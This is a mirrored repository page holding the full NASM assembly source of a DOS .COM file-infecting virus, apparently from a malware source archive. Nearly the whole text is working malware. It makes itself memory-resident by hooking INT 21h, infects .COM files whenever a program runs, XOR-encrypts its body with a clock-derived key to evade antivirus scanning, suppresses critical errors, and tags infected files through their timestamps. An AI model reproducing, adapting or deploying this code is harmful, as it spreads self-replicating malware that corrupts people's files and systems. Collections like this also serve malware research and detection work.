mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-24 04:15:26 +00:00
4b9382ddbc
push
386 lines
5.3 KiB
NASM
386 lines
5.3 KiB
NASM
;******************************************************************************
|
|
;******************************************************************************
|
|
;**** Virus: .COM /noTBAV ****
|
|
;**** By: Ramthes Jones ****
|
|
;******************************************************************************
|
|
;******************************************************************************
|
|
CODE SEGMENT
|
|
|
|
ASSUME CS:CODE, DS:CODE, ES:CODE, SS:CODE
|
|
ORG 0100h
|
|
|
|
DELTA EQU (TWO - ONE)
|
|
|
|
START:
|
|
JMP VIR_START
|
|
NOP
|
|
MOV AH,09h
|
|
MOV DX,OFFSET MSG
|
|
PUSH CS
|
|
POP DS
|
|
INT 21h
|
|
|
|
INT 20h
|
|
|
|
MSG DB 0Ah,0Dh,'Virus Mr-X activado!!!',0Ah,0Dh
|
|
DB 'Por favor no ejecute ningun archivo. Je, je, je...',0Ah,0Dh,'$'
|
|
|
|
VIR_START:
|
|
ONE LABEL BYTE
|
|
MOV BX,015Dh
|
|
PUSH BX
|
|
MOV SI,(OFFSET BEGIN - OFFSET ONE) - 1; Conocido
|
|
ADD SI,BX
|
|
MOV CX,(OFFSET TWO - OFFSET BEGIN) + 1; Conocido
|
|
MOV DX,0FFCDh ; FFCD = INT FFh
|
|
CLI
|
|
BUCLE:
|
|
MOV AH,[SI]
|
|
XOR AH,00h
|
|
DB 06 DUP (90h)
|
|
MOV [bx+30],DX
|
|
|
|
INTFFh LABEL WORD
|
|
MOV [SI],AH
|
|
MOV [bx+30],2488h
|
|
INC SI
|
|
LOOP BUCLE
|
|
|
|
STI
|
|
JMP ATBV
|
|
|
|
JODER:
|
|
MOV AH,4Ch
|
|
INT 21h
|
|
|
|
ATBV:
|
|
MOV AH,30h
|
|
INT 21h
|
|
|
|
BEGIN:
|
|
MOV AX,0ACACh
|
|
INT 21h
|
|
CMP AX,0CACAh
|
|
JE RUN_COM
|
|
JMP STAY_IN_MEMO
|
|
|
|
RUN_COM:
|
|
PUSH CS
|
|
PUSH CS
|
|
POP DS
|
|
POP ES
|
|
POP BX
|
|
MOV DI,100h
|
|
LEA SI,[(NORMAL - OFFSET ONE) + BX]
|
|
MOVSW
|
|
MOVSB
|
|
PUSH CS
|
|
PUSH 0100h
|
|
RETF
|
|
|
|
STAY_IN_MEMO:
|
|
MOV AH,4Ah
|
|
XOR BX,BX
|
|
INT 21h
|
|
|
|
MOV AH,4Ah
|
|
MOV BX,0FFFFh
|
|
INT 21h
|
|
|
|
SUB BX,61h ;101h
|
|
MOV AH,4Ah
|
|
INT 21h
|
|
|
|
MOV AH,48h
|
|
MOV BX,60h ;100h
|
|
INT 21h
|
|
|
|
MOV ES,AX
|
|
PUSH ES
|
|
DEC AX
|
|
MOV ES,AX
|
|
MOV ES:WORD PTR [0001h], 0008h
|
|
POP ES
|
|
|
|
PUSH CS
|
|
POP DS
|
|
|
|
POP SI
|
|
PUSH SI
|
|
XOR DI,DI
|
|
MOV CX,DELTA
|
|
CLD
|
|
REP MOVSB
|
|
|
|
PUSH ES
|
|
POP DS
|
|
|
|
MOV AX,3521h
|
|
INT 21h
|
|
POP SI
|
|
PUSH SI
|
|
MOV DS:[INT21IP - OFFSET ONE],BX
|
|
MOV DS:[INT21CS - OFFSET ONE],ES
|
|
|
|
MOV AX,2521h
|
|
MOV DX,(OFFSET HOOK_21 - OFFSET ONE)
|
|
INT 21h
|
|
JMP RUN_COM
|
|
|
|
HOOK_21 PROC FAR
|
|
PUSH DS
|
|
PUSHF
|
|
PUSH AX
|
|
PUSH BX
|
|
PUSH CX
|
|
PUSH DX
|
|
PUSH SI
|
|
PUSH DI
|
|
PUSH DS
|
|
PUSH ES
|
|
|
|
CMP AX,4B00h
|
|
JE INFECT_COM
|
|
CMP AX,0ACACh
|
|
JE GIVE_MARK
|
|
JMP FIN
|
|
|
|
GIVE_MARK:
|
|
POP ES
|
|
POP DS
|
|
POP DI
|
|
POP SI
|
|
POP DX
|
|
POP CX
|
|
POP BX
|
|
POP AX
|
|
POPF
|
|
POP DS
|
|
MOV AX,0CACAh
|
|
IRET
|
|
|
|
INFECT_COM:
|
|
PUSH AX
|
|
PUSH BX
|
|
PUSH DX
|
|
PUSH DS
|
|
PUSH ES
|
|
|
|
MOV AX, CS
|
|
MOV DS, AX
|
|
MOV AX,3524h
|
|
PUSHF
|
|
CALL DWORD PTR DS:[INT21IP - OFFSET ONE]
|
|
MOV DS:[INT24IP - OFFSET ONE],BX
|
|
MOV DS:[INT24CS - OFFSET ONE],ES
|
|
|
|
MOV AX,2524h
|
|
MOV DX,(OFFSET HOOK_24 - OFFSET ONE)
|
|
PUSHF
|
|
CALL DWORD PTR DS:[INT21IP - OFFSET ONE]
|
|
POP ES
|
|
POP DS
|
|
POP DX
|
|
POP BX
|
|
POP AX
|
|
|
|
PUSH DX
|
|
|
|
MOV AX,4300h
|
|
PUSHF
|
|
CALL DWORD PTR CS:[INT21IP - OFFSET ONE]
|
|
MOV CS:[(ATRIBUTOS - OFFSET ONE)],CX
|
|
|
|
MOV AX,4301h
|
|
MOV CX,20h
|
|
PUSHF
|
|
CALL DWORD PTR CS:[INT21IP - OFFSET ONE]
|
|
JC FINAL_1
|
|
|
|
MOV AX,3D02h
|
|
PUSHF
|
|
CALL DWORD PTR CS:[INT21IP - OFFSET ONE]
|
|
PUSH AX
|
|
POP BX
|
|
|
|
MOV AH,3Fh
|
|
MOV CX,2
|
|
PUSH CS
|
|
POP DS
|
|
MOV DX,(OFFSET NORMAL - OFFSET ONE)
|
|
PUSHF
|
|
CALL DWORD PTR CS:[INT21IP - OFFSET ONE]
|
|
|
|
XOR SI,SI
|
|
mov ax,cs:(normal - offset one)[si]
|
|
cmp ax,'ZM'
|
|
je final_1
|
|
jmp conti
|
|
|
|
FINAL_1:
|
|
JMP FINAL
|
|
|
|
CONTI:
|
|
MOV AX,5700h
|
|
PUSHF
|
|
CALL DWORD PTR CS:[INT21IP - OFFSET ONE]
|
|
MOV CS:[(HORA - OFFSET ONE)],CX
|
|
MOV CS:[(FECHA - OFFSET ONE)],DX
|
|
|
|
AND CL,00011111b ; Esto es lo correcto para comprobar
|
|
CMP CL,00001101b ; si los segundos son 26
|
|
JE FINAL_1
|
|
|
|
XOR AL,AL
|
|
CALL F_42h
|
|
|
|
MOV AH,3Fh
|
|
MOV CX,3
|
|
PUSH CS
|
|
POP DS
|
|
MOV DX,(OFFSET NORMAL - OFFSET ONE)
|
|
PUSHF
|
|
CALL DWORD PTR CS:[INT21IP - OFFSET ONE]
|
|
|
|
MOV AL,02h
|
|
CALL F_42h
|
|
PUSH AX
|
|
|
|
SUB AX,3
|
|
|
|
MOV SI,1
|
|
MOV CS:(BUFFER - OFFSET ONE)[SI],AL
|
|
INC SI
|
|
MOV CS:(BUFFER - OFFSET ONE)[SI],AH
|
|
|
|
PUSH BX
|
|
MOV AH,48h
|
|
MOV BX,150h
|
|
PUSHF
|
|
CALL DWORD PTR CS:[INT21IP - OFFSET ONE]
|
|
MOV ES,AX
|
|
POP BX
|
|
|
|
PUSH CS
|
|
POP DS
|
|
|
|
XOR SI,SI
|
|
MOV DI,SI
|
|
MOV CX,OFFSET TWO - OFFSET ONE
|
|
CLD
|
|
REP MOVSB
|
|
|
|
PUSH ES
|
|
POP DS
|
|
|
|
POP AX ; Calculo
|
|
INC AH ; la direccion
|
|
XOR SI,SI ; donde va a
|
|
MOV [SI + 1],AL ; comenzar el
|
|
MOV [SI + 2],AH ; arch infectado
|
|
|
|
MOV AH,2Ch
|
|
PUSHF
|
|
CALL DWORD PTR CS:[INT21IP - OFFSET ONE]
|
|
MOV [SI+20],DL
|
|
|
|
MOV CX,(OFFSET TWO - OFFSET BEGIN) + 1
|
|
MOV SI,(OFFSET BEGIN - OFFSET ONE) - 1
|
|
ENCRIPTO:
|
|
XOR ES:[SI],DL
|
|
INC SI
|
|
LOOP ENCRIPTO
|
|
|
|
MOV AH,40h
|
|
MOV CX,DELTA
|
|
XOR DX,DX
|
|
PUSH ES
|
|
POP DS
|
|
PUSHF
|
|
CALL DWORD PTR CS:[INT21IP - OFFSET ONE]
|
|
JC FINAL
|
|
|
|
MOV AH,49h
|
|
PUSHF
|
|
CALL DWORD PTR CS:[INT21IP - OFFSET ONE]
|
|
|
|
XOR AL,AL
|
|
CALL F_42h
|
|
|
|
MOV AH,40h
|
|
MOV CX,3
|
|
MOV DX,(OFFSET BUFFER - OFFSET ONE)
|
|
PUSH CS
|
|
POP DS
|
|
PUSHF
|
|
CALL DWORD PTR CS:[INT21IP - OFFSET ONE]
|
|
|
|
MOV AX,5701h
|
|
MOV CX,CS:[(HORA - OFFSET ONE)]
|
|
AND CL,11100000b
|
|
OR CL,00001101b
|
|
MOV DX,CS:[(FECHA - OFFSET ONE)]
|
|
PUSHF
|
|
CALL DWORD PTR CS:[INT21IP - OFFSET ONE]
|
|
FINAL:
|
|
MOV AH,3Eh
|
|
PUSHF
|
|
CALL DWORD PTR CS:[INT21IP - OFFSET ONE]
|
|
|
|
MOV AX,4301h
|
|
MOV CX,CS:[(ATRIBUTOS - OFFSET ONE)]
|
|
POP DX
|
|
PUSHF
|
|
CALL DWORD PTR CS:[INT21IP - OFFSET ONE]
|
|
|
|
MOV AX,2524h
|
|
MOV DX,CS:[INT24IP - OFFSET ONE]
|
|
MOV DS,CS:[INT24CS - OFFSET ONE]
|
|
PUSHF
|
|
CALL DWORD PTR CS:[INT21IP-OFFSET ONE]
|
|
|
|
FIN:
|
|
POP ES
|
|
POP DS
|
|
POP DI
|
|
POP SI
|
|
POP DX
|
|
POP CX
|
|
POP BX
|
|
POP AX
|
|
|
|
POPF
|
|
POP DS
|
|
JMP DWORD PTR CS:[(INT21IP - OFFSET ONE)]
|
|
|
|
F_42h PROC
|
|
MOV AH,42h
|
|
CWD
|
|
MOV CX,DX
|
|
PUSHF
|
|
CALL DWORD PTR CS:[INT21IP - OFFSET ONE]
|
|
RET
|
|
F_42h ENDP
|
|
|
|
HOOK_21 ENDP
|
|
|
|
HOOK_24 PROC
|
|
XOR AL,AL
|
|
IRET
|
|
HOOK_24 ENDP
|
|
|
|
INT21IP DW 0
|
|
INT21CS DW 0
|
|
INT24IP DW 0
|
|
INT24CS DW 0
|
|
INT17IP DW 0
|
|
INT17CS DW 0
|
|
ATRIBUTOS DW 0
|
|
HORA DW 0
|
|
FECHA DW 0
|
|
BUFFER DB 3 DUP(0E9h)
|
|
NORMAL DB 3 DUP(90h)
|
|
HIDDEN_MSG DB "Ramthes. World Cup'98: ARGENTINA!!"
|
|
TWO LABEL BYTE
|
|
CODE ENDS
|
|
END START |